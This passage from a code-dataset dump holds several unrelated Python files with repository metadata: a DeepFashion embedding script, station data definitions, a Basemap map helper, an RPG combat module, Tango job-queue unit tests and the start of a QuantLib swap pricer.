ToTensor(),
Normalize([0.7511, 0.7189, 0.7069], [0.2554, 0.2679, 0.2715]),
])
model.load_state_dict(torch.load('siamese_resnet18.pth'))
deep_fashion_root_dir = "./deepfashion_data"
train_ds = DeepFashionDataset(
deep_fashion_root_dir, 'train', transform=trans)
emb_net = model.emb_net
emb_net.cuda()
# subset
n_samples = 25000
sel_idx = np.random.choice(
list(range(len(train_ds))),
n_samples, replace=False)
assert len(set(sel_idx)) == n_samples
ds = Subset(train_ds, sel_idx)
loader = DataLoader(
ds, batch_size=100, pin_memory=True, num_workers=os.cpu_count())
print("extracting...")
embeddings, labels = extract_embeddings(emb_net, loader)
tsne = TSNE(n_iter=400, metric="euclidean")
projected_emb = tsne.fit_transform(embeddings)
with open('projected_emb.pkl', 'wb') as handle:
pickle.dump(projected_emb, handle, protocol=pickle.HIGHEST_PROTOCOL)
with open('labels.pkl', 'wb') as handle:
pickle.dump(labels, handle, protocol=pickle.HIGHEST_PROTOCOL)
| 28.491228
| 72
| 0.76601
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 122
| 0.075123
|
0b67517486e91d69f9ba0a1be6a90a8c7366f494
| 507
|
py
|
Python
|
src/stations/datastructures.py
|
cwerner/st-folium-demo
|
31bfc3184e7e90d1901ab48fd0d4ee6026f97fe6
|
[
"Apache-2.0"
] | 1
|
2021-03-19T11:10:04.000Z
|
2021-03-19T11:10:04.000Z
|
src/stations/datastructures.py
|
cwerner/st-folium-demo
|
31bfc3184e7e90d1901ab48fd0d4ee6026f97fe6
|
[
"Apache-2.0"
] | null | null | null |
src/stations/datastructures.py
|
cwerner/st-folium-demo
|
31bfc3184e7e90d1901ab48fd0d4ee6026f97fe6
|
[
"Apache-2.0"
] | null | null | null |
from enum import Enum
# ifu
ifu = {"name": "IFU", "geo_lat": 47.476180, "geo_lon": 11.063350}
# tereno stations
tereno_stations = [
{"name": "Fendth", "geo_lat": 47.83243, "geo_lon": 11.06111},
{"name": "Grasswang", "geo_lat": 47.57026, "geo_lon": 11.03189},
{"name": "Rottenbuch", "geo_lat": 47.73032, "geo_lon": 11.03189},
]
class RES(Enum):
TENMIN = "10_minutes"
HOURLY = "hourly"
DAILY = "daily"
@staticmethod
def names():
return list(RES)
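# Example: RES.DAILY.value == "daily", and RES.names() returns every member,
# i.e. [RES.TENMIN, RES.HOURLY, RES.DAILY].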
| 23.045455
| 69
| 0.601578
| 163
| 0.321499
| 0
| 0
| 73
| 0.143984
| 0
| 0
| 181
| 0.357002
|
0b6861770f6d11f0e6e5144b7f72620064b17922
| 2,217
|
py
|
Python
|
Tools/Scripts/Python/module_Basemap_RegCM_domain.py
|
taobrienlbl/RegCM
|
bda1c78790f0a1501916d0979b843216a08b2cef
|
[
"AFL-1.1"
] | 27
|
2019-04-23T08:36:25.000Z
|
2021-11-15T08:55:01.000Z
|
Tools/Scripts/Python/module_Basemap_RegCM_domain.py
|
taobrienlbl/RegCM
|
bda1c78790f0a1501916d0979b843216a08b2cef
|
[
"AFL-1.1"
] | 9
|
2020-02-20T06:43:03.000Z
|
2021-09-24T11:26:46.000Z
|
Tools/Scripts/Python/module_Basemap_RegCM_domain.py
|
taobrienlbl/RegCM
|
bda1c78790f0a1501916d0979b843216a08b2cef
|
[
"AFL-1.1"
] | 17
|
2019-06-10T12:49:05.000Z
|
2021-11-14T06:55:20.000Z
|
#!/usr/bin/python2.6
""" Here a comment starts, with 3 quotation marks. In the same way, the comment ends ...
Purpose: Draw a base map of the CORDEX domain
Selected projection: Miller Cylindrical Projection (projection='mill' in the code below)
Date: Sept. 26, 2018
Author: S. STRADA
REFERENCES:
Basemap Tool
http://basemaptutorial.readthedocs.org/en/latest/index.html
https://matplotlib.org/basemap/
"""
######################################################
# Import modules you need
#-----------------------------------------------------
from mpl_toolkits.basemap import Basemap, cm
import matplotlib.pyplot as plt
import numpy as np
######################################################
### Python fuction to build a map using a specific projection
#-----------------------------------------------------
def map_RegCMdomain(ax, lat_start, lat_end, lon_start, lon_end, lon0, lat0, fontsize, dparall, dmerid):
"""
How to call the function in a script to create a basemap object :
1. Import function to create the domain
from module_Basemap_RegCM_domain import map_RegCMdomain
2. Call the function and pass to it all needed variables
m = map_RegCMdomain(ax, lat_start, lat_end, lon_start, lon_end, lon0, lat0, fontsize, dparall, dmerid)
Set up the Miller Cylindrical Projection
--> llcrnrlat,llcrnrlon,urcrnrlat,urcrnrlon are the lat/lon values of the lower left and upper right corners of the map
--> resolution = 'i' means intermediate coastline resolution
--> area_thresh=1000 means don't plot coastline features less than 1000 km^2 in area (pay attention to this if you need to plot small islands!)
"""
m = Basemap(ax=ax, llcrnrlon=lon_start, llcrnrlat=lat_start, urcrnrlon=lon_end, urcrnrlat=lat_end,
resolution='i', area_thresh=1000., projection='mill', lon_0=lon0, lat_0=lat0, lat_ts=0)
m.drawcoastlines(color='k',linewidth=1, zorder=10)
m.drawcountries(color='k',linewidth=0.5, zorder=11)
m.drawparallels(range(-90, 90, dparall), labels=[1,0,0,0], fontsize=fontsize, dashes=[1, 2],linewidth=1, color='k', zorder=12)
m.drawmeridians(range(-180, 180, dmerid),labels=[0,0,0,1], fontsize=fontsize, dashes=[1, 2],linewidth=1, color='k', zorder=12)
return m
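# Minimal usage sketch (illustrative values, not part of the original module):
#
#   import matplotlib.pyplot as plt
#   fig, ax = plt.subplots()
#   m = map_RegCMdomain(ax, lat_start=30, lat_end=50, lon_start=-10, lon_end=40,
#                       lon0=15, lat0=40, fontsize=10, dparall=5, dmerid=10)
#   plt.show()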
| 41.830189
| 145
| 0.656292
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,424
| 0.642309
|
0b691cc681e4265eeba5b9e50b719f23cdd77315
| 24,369
|
py
|
Python
|
old_game/combat.py
|
jwvhewitt/dmeternal
|
bb09f2d497daf9b40dd8cfee10c55be55fb7c3cb
|
[
"Apache-2.0"
] | 53
|
2015-07-03T21:25:36.000Z
|
2022-02-18T23:08:38.000Z
|
old_game/combat.py
|
jwvhewitt/dmeternal
|
bb09f2d497daf9b40dd8cfee10c55be55fb7c3cb
|
[
"Apache-2.0"
] | 5
|
2015-07-03T21:27:12.000Z
|
2016-12-08T14:40:38.000Z
|
old_game/combat.py
|
jwvhewitt/dmeternal
|
bb09f2d497daf9b40dd8cfee10c55be55fb7c3cb
|
[
"Apache-2.0"
] | 14
|
2016-02-02T06:49:51.000Z
|
2022-02-24T13:24:35.000Z
|
from . import characters
from . import teams
from . import hotmaps
from . import pygwrap
import pygame
from . import maps
import collections
from . import image
from . import pfov
import random
from . import stats
from . import rpgmenu
from . import animobs
from . import effects
from . import enchantments
from . import aibrain
from . import services
class TacticsRedraw( object ):
def __init__( self, chara, comba, explo, hmap = None ):
self.chara = chara
self.comba = comba
self.explo = explo
self.hmap = hmap
self.rect = pygame.Rect( 32, 32, 300, 15 )
self.gems = image.Image( "sys_counters.png", 10, 16 )
def __call__( self, screen ):
self.explo.view( screen )
pygwrap.default_border.render( screen, self.rect )
pygwrap.draw_text( screen, pygwrap.SMALLFONT, str( self.chara ), self.rect )
ap = min( self.chara.get_move() - self.comba.ap_spent[ self.chara ], 24 )
if self.hmap and self.comba.scene.on_the_map( *self.explo.view.mouse_tile ):
apr = ap - self.hmap.map[self.explo.view.mouse_tile[0]][self.explo.view.mouse_tile[1]]
else:
apr = ap
if ap > 0:
mydest = pygame.Rect( self.rect.x + 180, self.rect.y, 32, 32 )
pygwrap.draw_text( screen, pygwrap.ITALICFONT, "AP:", mydest )
for t in range( 1, (ap+3)//2 ):
mydest.x = self.rect.x + 198 + t * 8
if t <= ( apr + 1 ) //2:
if apr >= t * 2:
self.gems.render( screen, mydest, 1 )
else:
self.gems.render( screen, mydest, 6 )
else:
self.gems.render( screen, mydest, 5 )
class CombatStat( object ):
"""Keep track of some stats that only matter during combat."""
def __init__( self ):
self.paralysis = 0
self.confusion = 0
self.asleep = False
self.silent = False
self.aoo_readied = False
self.attacks_so_far = 0
def can_act( self ):
return self.paralysis < 1 and not self.asleep
# This is a complex effect- Check if target is undead. If so, first apply an
# enchantment. Then, make skill roll to cause 20-120 solar damage and paralysis.
# If that skill roll fails, make an easier skill roll to just cause paralysis.
HOLY_SIGN_EFFECT = effects.TargetIs( effects.UNDEAD, on_true = (
    effects.Enchant( enchantments.HolySignMark, anim=animobs.YellowSparkle, children=(
        effects.OpposedRoll( stats.HOLY_SIGN, stats.CHARISMA, -70, stats.MAGIC_DEFENSE, stats.PIETY,
            on_success = (
                effects.HealthDamage( (20,6,0), stats.PIETY, element=stats.RESIST_SOLAR,
                    anim=animobs.YellowExplosion,
                    on_success=( effects.Paralyze(max_duration=6), ) ),
            ),
            on_failure = (
                effects.OpposedRoll( stats.HOLY_SIGN, stats.CHARISMA, 5, stats.MAGIC_DEFENSE, stats.PIETY,
                    on_success = (
                        # Is there an obfuscated Python competition?
                        effects.Paralyze(max_duration=8),
                    ) ),
            ) ),
    ) ),
) )
class Combat( object ):
def __init__( self, camp, monster_zero ):
self.active = []
self.scene = camp.scene
self.camp = camp
self.ap_spent = collections.defaultdict( int )
self.cstat = collections.defaultdict( CombatStat )
self.no_quit = True
self.activate_monster( monster_zero )
# Sort based on initiative roll.
self.active.sort( key = characters.roll_initiative, reverse=True )
def activate_monster( self, monster_zero ):
for m in self.scene.contents:
if isinstance( m, characters.Character ) and m.is_alright() and m not in self.active:
if m in self.camp.party:
self.active.append( m )
elif self.scene.distance( m.pos, monster_zero.pos ) < 5:
self.active.append( m )
elif m.team and m.team == monster_zero.team:
self.active.append( m )
def num_enemies( self ):
"""Return the number of active, hostile characters."""
n = 0
for m in self.active:
if isinstance( m, characters.Character ) and m.is_alright() and m.is_hostile( self.camp ):
n += 1
return n
def can_act( self, chara ):
"""Return True if the provided character can act right now."""
return chara.is_alright() and self.ap_spent[ chara ] < chara.get_move() and self.cstat[chara].can_act()
def still_fighting( self ):
"""Keep playing as long as there are enemies, players, and no quit."""
return self.num_enemies() and self.camp.first_living_pc() and self.no_quit and not pygwrap.GOT_QUIT and not self.camp.destination
def get_threatened_area( self, chara ):
area = set()
for m in self.active:
if m.is_alright() and m.is_enemy( self.camp, chara ) and m.can_attack_of_opportunity() and self.cstat[m].aoo_readied and self.cstat[m].can_act():
x,y = m.pos
for d in self.scene.DELTA8:
area.add( (x + d[0], y + d[1] ) )
return area
def opportunity_to_attack( self, explo, target ):
"""Enemies with attacks of opportunity can attack this target."""
for m in self.active[:]:
if m.is_alright() and m.is_enemy( self.camp, target ) and m.can_attack_of_opportunity() and self.cstat[m].aoo_readied and self.cstat[m].can_act() and self.scene.distance(m.pos,target.pos) <= 1:
self.attack( explo, m, target, attack_of_opportunity=True )
self.cstat[m].aoo_readied = False
# If the target is killed, everyone else can stop piling on.
if not target.is_alright():
break
def step( self, explo, chara, hmap, do_bump=False ):
"""Move chara according to hmap, return True if movement ended."""
# See if the movement starts in a threatened area- may be attacked if it ends
# in a threatened area as well.
threat_area = self.get_threatened_area( chara )
started_in_threat = chara.pos in threat_area
best_d = hmap.clever_downhill_dir( explo, chara.pos )
if best_d:
x2 = best_d[0] + chara.pos[0]
y2 = best_d[1] + chara.pos[1]
target = self.scene.get_character_at_spot( (x2,y2) )
if explo.scene.map[x2][y2].blocks_walking():
if do_bump:
explo.bump_tile( (x2,y2), chara )
self.end_turn( chara )
return True
elif not target:
# Move the character.
chara.pos = (x2,y2)
self.ap_spent[ chara ] += 1 + abs(best_d[0]) + abs(best_d[1])
# Suffer any field effects.
fld = self.scene.get_field_at_spot( chara.pos )
if fld:
fld.invoke( explo )
# Maybe take an attack of opportunity.
if chara.is_alright() and started_in_threat and chara.pos in threat_area and not chara.hidden:
self.opportunity_to_attack( explo, chara )
return False
else:
return target
else:
return True
def move_player_to_spot( self, explo, chara, pos, redraw=None ):
result = None
if not redraw:
redraw = explo.view
explo.view.overlays.clear()
if self.scene.on_the_map( *pos ):
hmap = hotmaps.PointMap( self.scene, pos, avoid_models=True )
while self.ap_spent[ chara ] < chara.get_move():
result = self.step( explo, chara, hmap, do_bump=True )
self.scene.update_party_position( explo.camp.party )
if result:
break
redraw( explo.screen )
pygame.display.flip()
pygwrap.anim_delay()
return result
def attack( self, explo, chara, target, redraw=None, attack_of_opportunity=False ):
"""Perform chara's attack against target."""
# Determine the number of attacks. If the character has moved one step or less, a full attack is possible.
if attack_of_opportunity:
# One attack at a +0 modifier
num_attacks = [0]
elif self.ap_spent[chara] <= 3:
num_attacks = chara.series_of_attacks()
else:
# One attack at a +0 modifier
num_attacks = [0]
for a in num_attacks:
if chara.can_attack() and target.is_alright():
# The attack modifier is based on whether this is the character's
# first, second, etc attack and also if the target is being ganged
# up on.
at_fx = chara.get_attack_effect( roll_mod = a + self.cstat[target].attacks_so_far * 5 )
at_anim = chara.get_attack_shot_anim()
if at_anim:
opening_shot = at_anim( chara.pos, target.pos )
else:
opening_shot = None
explo.invoke_effect( at_fx, chara, (target.pos,), opening_shot )
chara.spend_attack_price()
# A hidden character will likely be revealed if the target survived.
if target.is_alright() and chara.hidden and random.randint(1,100) + target.get_stat(stats.AWARENESS) + target.get_stat_bonus(stats.INTELLIGENCE) > chara.get_stat(stats.STEALTH) + chara.get_stat_bonus(stats.REFLEXES):
chara.hidden = False
# Record the fact that this target has been attacked.
self.cstat[target].attacks_so_far += 1
else:
break
if ( target.is_alright() and target.can_attack_of_opportunity() and self.cstat[target].can_act()
and self.scene.distance(target.pos,chara.pos) <= target.get_attack_reach() and not attack_of_opportunity ):
# Target may be able to counterattack.
if random.randint(1,100) <= min( target.get_stat( stats.COUNTER_ATTACK ), 95 ):
self.attack( explo, target, chara, redraw, True )
if not attack_of_opportunity:
self.end_turn( chara )
def move_to_attack( self, explo, chara, target, redraw=None ):
result = None
if not redraw:
redraw = explo.view
explo.view.overlays.clear()
if self.scene.on_the_map( *target.pos ):
attack_positions = pfov.AttackReach( self.scene, target.pos[0], target.pos[1], chara.get_attack_reach() ).tiles
# Remove the positions of models from the goal tiles, so they will be avoided.
for m in self.scene.contents:
if self.scene.is_model(m) and m.pos in attack_positions and m is not chara:
attack_positions.remove( m.pos )
hmap = hotmaps.HotMap( self.scene, attack_positions, avoid_models=True )
while self.ap_spent[ chara ] < chara.get_move():
result = self.step( explo, chara, hmap )
if chara in self.camp.party:
self.scene.update_party_position( explo.camp.party )
if result:
break
redraw( explo.screen )
pygame.display.flip()
pygwrap.anim_delay()
if chara.pos in attack_positions:
# Close enough to attack. Make it so.
self.attack( explo, chara, target, redraw )
return result
def end_turn( self, chara ):
"""End this character's turn."""
self.ap_spent[ chara ] += chara.get_move()
def attempt_stealth( self, explo, chara ):
"""Make a stealth roll for chara vs best enemy awareness roll."""
# Determine the highest awareness of all enemies.
hi = 0
for m in self.active:
if m.is_alright() and m.is_enemy( self.camp, chara ):
awareness = m.get_stat( stats.AWARENESS ) + m.get_stat_bonus( stats.INTELLIGENCE )
hi = max( hi, awareness )
# The target number is clamped between 5 and 96, so there is always at least a 5% chance of success or failure.
hi = min( max( hi - chara.get_stat( stats.STEALTH ) - chara.get_stat_bonus( stats.REFLEXES ) + 45 , 5 ), 96 )
anims = list()
if random.randint(1,100) >= hi:
chara.hidden = True
anims.append( animobs.Smoke( pos=chara.pos ) )
else:
anims.append( animobs.Smoke( pos=chara.pos ) )
anims.append( animobs.Caption( "Fail!", pos=chara.pos ) )
animobs.handle_anim_sequence( explo.screen, explo.view, anims )
self.end_turn( chara )
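    # Worked example (illustrative numbers): if the best enemy awareness roll
    # is 60 and the character has STEALTH 40 plus a REFLEXES bonus of 10, the
    # clamped target number is min(max(60 - 40 - 10 + 45, 5), 96) = 55, so
    # rolls of 55-100 (a 46% chance) hide successfully.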
def attempt_awareness( self, explo, chara ):
"""Try to spot any hidden models taking part in combat."""
awareness = chara.get_stat( stats.AWARENESS ) + chara.get_stat_bonus( stats.INTELLIGENCE ) + 55
anims = list()
for m in self.active:
if m.is_alright() and m.is_enemy( self.camp, chara ) and m.hidden:
spot_chance = max( awareness - m.get_stat( stats.STEALTH ) - chara.get_stat_bonus( stats.REFLEXES ), 10)
if random.randint(1,100) <= spot_chance:
m.hidden = False
anims.append( animobs.PurpleSparkle( pos=m.pos ) )
if not anims:
anims.append( animobs.Caption( "Fail!", pos=chara.pos ) )
animobs.handle_anim_sequence( explo.screen, explo.view, anims )
self.end_turn( chara )
def attempt_holy_sign( self, explo, chara ):
"""Attempt to disrupt the undead creatures in the area."""
aoe = pfov.PointOfView(self.scene, chara.pos[0], chara.pos[1], 16).tiles
explo.invoke_effect( HOLY_SIGN_EFFECT, chara, aoe, animobs.Marquee(chara.pos) )
chara.holy_signs_used += 1
self.end_turn( chara )
def num_enemies_hiding( self, chara ):
n = 0
for m in self.active:
if m.is_alright() and m.is_enemy( self.camp, chara ) and m.hidden:
n += 1
return n
def pop_useitem_menu( self, explo, chara ):
mymenu = rpgmenu.PopUpMenu( explo.screen, explo.view )
for i in chara.contents:
if hasattr( i, "use" ):
mymenu.add_item( str( i ) , i )
mymenu.sort()
mymenu.add_alpha_keys()
choice = mymenu.query()
if choice:
if choice.use( chara, explo ):
self.end_turn( chara )
def pop_combat_menu( self, explo, chara ):
mymenu = rpgmenu.PopUpMenu( explo.screen, explo.view )
# Add the techniques.
techs = chara.get_invocations( True )
for t in techs:
mymenu.add_item( t.menu_str(), t )
mymenu.sort()
mymenu.add_alpha_keys()
mymenu.add_item( "-----", False )
if chara.can_use_holy_sign() and chara.holy_signs_used < chara.holy_signs_per_day():
mymenu.add_item( "Skill: Holy Sign [{0}/{1}]".format(chara.holy_signs_per_day()-chara.holy_signs_used,chara.holy_signs_per_day()) , 6 )
if chara.can_use_stealth() and not chara.hidden:
mymenu.add_item( "Skill: Stealth", 4 )
if self.num_enemies_hiding(chara):
mymenu.add_item( "Skill: Awareness", 5 )
if any( hasattr( i, "use" ) for i in chara.contents ):
mymenu.add_item( "Use Item", 7 )
mymenu.add_item( "View Inventory".format(str(chara)), 2 )
mymenu.add_item( "Focus on {0}".format(str(chara)), 1 )
mymenu.add_item( "End Turn".format(str(chara)), 3 )
choice = mymenu.query()
if choice == 1:
explo.view.focus( explo.screen, *chara.pos )
elif choice == 2:
explo.view_party( self.camp.party.index(chara), can_switch=False )
self.end_turn( chara )
elif choice == 3:
self.end_turn( chara )
elif choice == 4:
self.attempt_stealth( explo, chara )
elif choice == 5:
self.attempt_awareness( explo, chara )
elif choice == 6:
self.attempt_holy_sign( explo, chara )
elif choice == 7:
self.pop_useitem_menu( explo, chara )
elif choice:
# Presumably, this is an invocation of some kind.
if explo.pc_use_technique( chara, choice, choice.com_tar ):
self.end_turn( chara )
def do_player_action( self, explo, chara ):
#Start by making a hotmap centered on PC, to see how far can move.
hm = hotmaps.MoveMap( self.scene, chara )
tacred = TacticsRedraw( chara, self, explo, hm )
while self.can_act( chara ) and self.still_fighting():
# Get input and process it.
gdi = pygwrap.wait_event()
if gdi.type == pygwrap.TIMEREVENT:
explo.view.overlays.clear()
explo.view.overlays[ chara.pos ] = maps.OVERLAY_CURRENTCHARA
explo.view.overlays[ explo.view.mouse_tile ] = maps.OVERLAY_CURSOR
tacred( explo.screen )
pygame.display.flip()
else:
if gdi.type == pygame.KEYDOWN:
if gdi.str == "Q":
self.camp.save(explo.screen)
self.no_quit = False
elif gdi.str == "i":
explo.view_party( self.camp.party.index(chara), can_switch=False )
self.end_turn( chara )
elif gdi.str == "c":
explo.view.focus( explo.screen, *chara.pos )
elif gdi.str == " ":
self.end_turn( chara )
elif gdi.type == pygame.MOUSEBUTTONUP:
if gdi.button == 1:
# Left mouse button.
if ( explo.view.mouse_tile != chara.pos ) and self.scene.on_the_map( *explo.view.mouse_tile ):
tacred.hmap = None
target = explo.view.modelmap.get( explo.view.mouse_tile, None )
if target and target.is_hostile( self.camp ):
if chara.can_attack():
self.move_to_attack( explo, chara, target, tacred )
else:
explo.alert( "You are out of ammunition!" )
else:
self.move_player_to_spot( explo, chara, explo.view.mouse_tile, tacred )
tacred.hmap = hotmaps.MoveMap( self.scene, chara )
else:
self.pop_combat_menu( explo, chara )
def do_npc_action( self, explo, chara ):
tacred = TacticsRedraw( chara, self, explo )
tacred( explo.screen )
pygame.display.flip()
chara.COMBAT_AI.act( explo, chara, tacred )
self.end_turn( chara )
        # If very far from the nearest PC, deactivate.
        enemy_found = False
        for m in self.scene.contents:
            if isinstance( m, characters.Character ) and chara.is_enemy( self.camp, m ) and self.scene.distance( chara.pos, m.pos ) <= 12:
                enemy_found = True
                break
        if not enemy_found:
            self.active.remove( chara )
def do_combat_action( self, explo, chara ):
"""Give this character its turn."""
started_turn_hidden = chara.hidden
# If you start your turn in a field, you get affected by that field.
fld = self.scene.get_field_at_spot( chara.pos )
if fld:
fld.invoke( explo )
# Check the character's condition to see what they can do...
if self.cstat[chara].paralysis > 0:
# This character can do nothing this turn.
self.end_turn( chara )
self.cstat[chara].paralysis += -1
elif self.cstat[chara].asleep:
# This character can do nothing this turn... may wake up.
self.end_turn( chara )
if random.randint(1,3) == 2:
self.cstat[chara].asleep = False
else:
# No special psychology or conditions- just do stuff.
if chara in self.camp.party:
self.do_player_action( explo, chara )
else:
self.do_npc_action( explo, chara )
# If they started the turn hidden, random chance of decloaking.
if started_turn_hidden and random.randint(1,10)==1:
chara.hidden = False
def give_xp_and_treasure( self, explo ):
"""Add up xp,gold from defeated monsters, and give to party."""
xp = 0
gold = 0
for m in self.active:
if m.is_hostile( self.camp ) and not m.is_alright() and not (hasattr(m,"combat_only") and m.combat_only):
xp += m.xp_value()
if hasattr( m, "gold" ) and m.gold > 0:
gold += m.gold
# Killing faction members worsens faction score.
if m.team.fac:
m.team.fac.reaction += -2
xp = int( xp * self.camp.xp_scale ) // self.camp.num_pcs()
explo.give_gold_and_xp( gold, xp, True )
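    # Worked example of the split above (hypothetical numbers, not from the
    # source): 500 raw XP with xp_scale 1.0 and a 4-PC party yields
    # int(500 * 1.0) // 4 = 125 XP handed to the party.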
def do_first_aid( self, explo ):
# At the end of combat, help anyone who was wounded.
fx = effects.HealthRestore( dice=(1,6,explo.camp.party_rank()), stat_bonus=None )
targets = list()
for pc in explo.camp.party:
if pc.is_alright() and hasattr( pc, "most_recent_wound" ) and pc.hp_damage > 0:
targets.append( pc.pos )
del pc.most_recent_wound
explo.invoke_effect( fx, None, targets )
def recover_fainted(self,explo):
for pc in explo.camp.party:
if not (pc.is_dead() or pc.is_alright()):
# This PC is neither dead nor alright- in other words, fainted.
pc.hp_damage = pc.max_hp() - 1
pc.place( explo.camp.scene, services.Temple.get_return_pos(explo) )
#explo.camp.scene.contents.append( pc )
def everybody_is_dead(self,explo):
# If the entire party is dead, dispose of their items and thwack their gold.
for pc in explo.camp.party:
pc.drop_everything(explo.camp.scene)
explo.camp.gold = explo.camp.gold // 4
def go( self, explo ):
"""Perform this combat."""
n = 0
while self.still_fighting():
if n >= len( self.active ):
# It's the end of the round.
n = 0
self.ap_spent.clear()
explo.update_monsters()
if self.active[n].is_alright():
chara = self.active[n]
self.do_combat_action( explo, chara )
# After action, invoke enchantments and renew attacks of opportunity
explo.invoke_enchantments( chara )
self.cstat[chara].aoo_readied = True
self.cstat[chara].attacks_so_far = 0
n += 1
if self.no_quit and not pygwrap.GOT_QUIT:
# Combat is over. Deal with things.
explo.check_trigger( "COMBATOVER" )
if self.camp.num_pcs() > 0:
                # Combat has ended because we ran out of enemies. Dole out experience.
self.give_xp_and_treasure( explo )
# Provide some end-of-combat first aid.
#self.do_first_aid(explo)
self.recover_fainted(explo)
# PCs stop hiding when combat ends.
for pc in self.camp.party:
pc.hidden = False
pc.condition.tidy( enchantments.COMBAT )
# Tidy up any combat enchantments.
for m in self.scene.contents[:]:
if hasattr( m, "condition" ):
m.condition.tidy( enchantments.COMBAT )
if hasattr( m, "combat_only" ) and m.combat_only:
self.scene.contents.remove( m )
elif hasattr( m, "mitose" ) and hasattr( m, "hp_damage" ):
# Slimes regenerate after battle, to prevent split/flee exploit.
m.hp_damage = 0
# I do not intend to create one more boring derivative fantasy RPG. I intend to create all of the boring derivative fantasy RPGs.
| 43.207447
| 232
| 0.57249
| 22,963
| 0.942304
| 0
| 0
| 0
| 0
| 0
| 0
| 3,684
| 0.151176
|
0b6a970c6ea0942a3a8927c5faff7c9dff07c309
| 4,096
|
py
|
Python
|
tests/testJobQueue.py
|
hartloff/Tango
|
9dd867a596441e0e2ba1069017781dddb9c79bdb
|
[
"Apache-2.0"
] | 2
|
2020-10-30T03:01:55.000Z
|
2021-03-25T03:18:12.000Z
|
tests/testJobQueue.py
|
hartloff/Tango
|
9dd867a596441e0e2ba1069017781dddb9c79bdb
|
[
"Apache-2.0"
] | 7
|
2018-06-26T02:48:09.000Z
|
2021-01-21T03:12:19.000Z
|
tests/testJobQueue.py
|
hartloff/Tango
|
9dd867a596441e0e2ba1069017781dddb9c79bdb
|
[
"Apache-2.0"
] | 9
|
2018-09-28T23:48:48.000Z
|
2021-10-03T20:29:48.000Z
|
import unittest
import redis
from jobQueue import JobQueue
from tangoObjects import TangoIntValue, TangoJob
from config import Config
class TestJobQueue(unittest.TestCase):
def setUp(self):
if Config.USE_REDIS:
__db = redis.StrictRedis(
Config.REDIS_HOSTNAME, Config.REDIS_PORT, db=0)
__db.flushall()
self.job1 = TangoJob(
name="sample_job_1",
vm="ilter.img",
outputFile="sample_job_1_output",
input=[],
timeout=30,
notifyURL="notifyMeUrl",
maxOutputFileSize=4096)
self.job2 = TangoJob(
name="sample_job_2",
vm="ilter.img",
outputFile="sample_job_2_output",
input=[],
timeout=30,
notifyURL="notifyMeUrl",
maxOutputFileSize=4096)
self.jobQueue = JobQueue(None)
self.jobQueue.reset()
self.jobId1 = self.jobQueue.add(self.job1)
self.jobId2 = self.jobQueue.add(self.job2)
def test_sharedInt(self):
if Config.USE_REDIS:
num1 = TangoIntValue("nextID", 1000)
num2 = TangoIntValue("nextID", 3000)
self.assertEqual(num1.get(), 1000)
self.assertEqual(num1.get(), num2.get())
else:
return
def test_job(self):
self.job1.makeUnassigned()
self.assertTrue(self.job1.isNotAssigned())
job = self.jobQueue.get(self.jobId1)
self.assertTrue(job.isNotAssigned())
self.job1.makeAssigned()
print "Checkout:"
self.assertFalse(self.job1.isNotAssigned())
self.assertFalse(job.isNotAssigned())
def test_add(self):
info = self.jobQueue.getInfo()
self.assertEqual(info['size'], 2)
def test_addDead(self):
return self.assertEqual(1, 1)
def test_remove(self):
self.jobQueue.remove(self.jobId1)
info = self.jobQueue.getInfo()
self.assertEqual(info['size'], 1)
self.jobQueue.remove(self.jobId2)
info = self.jobQueue.getInfo()
self.assertEqual(info['size'], 0)
def test_delJob(self):
self.jobQueue.delJob(self.jobId1, 0)
info = self.jobQueue.getInfo()
self.assertEqual(info['size'], 1)
self.assertEqual(info['size_deadjobs'], 1)
self.jobQueue.delJob(self.jobId1, 1)
info = self.jobQueue.getInfo()
self.assertEqual(info['size_deadjobs'], 0)
return False
def test_get(self):
ret_job_1 = self.jobQueue.get(self.jobId1)
self.assertEqual(str(ret_job_1.id), self.jobId1)
ret_job_2 = self.jobQueue.get(self.jobId2)
self.assertEqual(str(ret_job_2.id), self.jobId2)
def test_getNextPendingJob(self):
self.jobQueue.assignJob(self.jobId2)
self.jobQueue.unassignJob(self.jobId1)
exp_id = self.jobQueue.getNextPendingJob()
self.assertMultiLineEqual(exp_id, self.jobId1)
def test_getNextPendingJobReuse(self):
return False
def test_assignJob(self):
self.jobQueue.assignJob(self.jobId1)
job = self.jobQueue.get(self.jobId1)
self.assertFalse(job.isNotAssigned())
def test_unassignJob(self):
self.jobQueue.assignJob(self.jobId1)
job = self.jobQueue.get(self.jobId1)
self.assertTrue(job.assigned)
self.jobQueue.unassignJob(self.jobId1)
job = self.jobQueue.get(self.jobId1)
return self.assertEqual(job.assigned, False)
def test_makeDead(self):
info = self.jobQueue.getInfo()
self.assertEqual(info['size_deadjobs'], 0)
self.jobQueue.makeDead(self.jobId1, "test")
info = self.jobQueue.getInfo()
self.assertEqual(info['size_deadjobs'], 1)
def test__getNextID(self):
init_id = self.jobQueue.nextID
        for i in range(1, Config.MAX_JOBID + 100):
id = self.jobQueue._getNextID()
self.assertNotEqual(str(id), self.jobId1)
self.jobQueue.nextID = init_id
if __name__ == '__main__':
unittest.main()
| 29.681159
| 63
| 0.619141
| 3,910
| 0.95459
| 0
| 0
| 0
| 0
| 0
| 0
| 245
| 0.059814
|
0b6b9493f9b4caffc3dc8d7eb74ffd39200333e1
| 6,891
|
py
|
Python
|
hybmc/products/Swap.py
|
sschlenkrich/HybridMonteCarlo
|
72f54aa4bcd742430462b27b72d70369c01f9ac4
|
[
"MIT"
] | 3
|
2021-08-18T18:34:41.000Z
|
2021-12-24T07:05:19.000Z
|
hybmc/products/Swap.py
|
sschlenkrich/HybridMonteCarlo
|
72f54aa4bcd742430462b27b72d70369c01f9ac4
|
[
"MIT"
] | null | null | null |
hybmc/products/Swap.py
|
sschlenkrich/HybridMonteCarlo
|
72f54aa4bcd742430462b27b72d70369c01f9ac4
|
[
"MIT"
] | 3
|
2021-01-31T11:41:19.000Z
|
2022-03-25T19:51:20.000Z
|
#!/usr/bin/python
import sys
sys.path.append('./')
import QuantLib as ql
from hybmc.simulations.Payoffs import Payoff, Fixed, ZeroBond, LiborRate, Cache, Asset
from hybmc.simulations.AmcPayoffs import AmcSum
from hybmc.products.Product import Product
def DiscountedPayoffFromCashFlow(cf, obsTime, payOrReceive, discYtsH=None, currencyAlias=None):
# this is a bit dangerous if someone changes evaluation date
today = ql.Settings.instance().getEvaluationDate()
# model time is measured via Act/365 (Fixed)
dc = ql.Actual365Fixed()
# first try a libor coupon
cp = ql.as_floating_rate_coupon(cf)
if cp is not None:
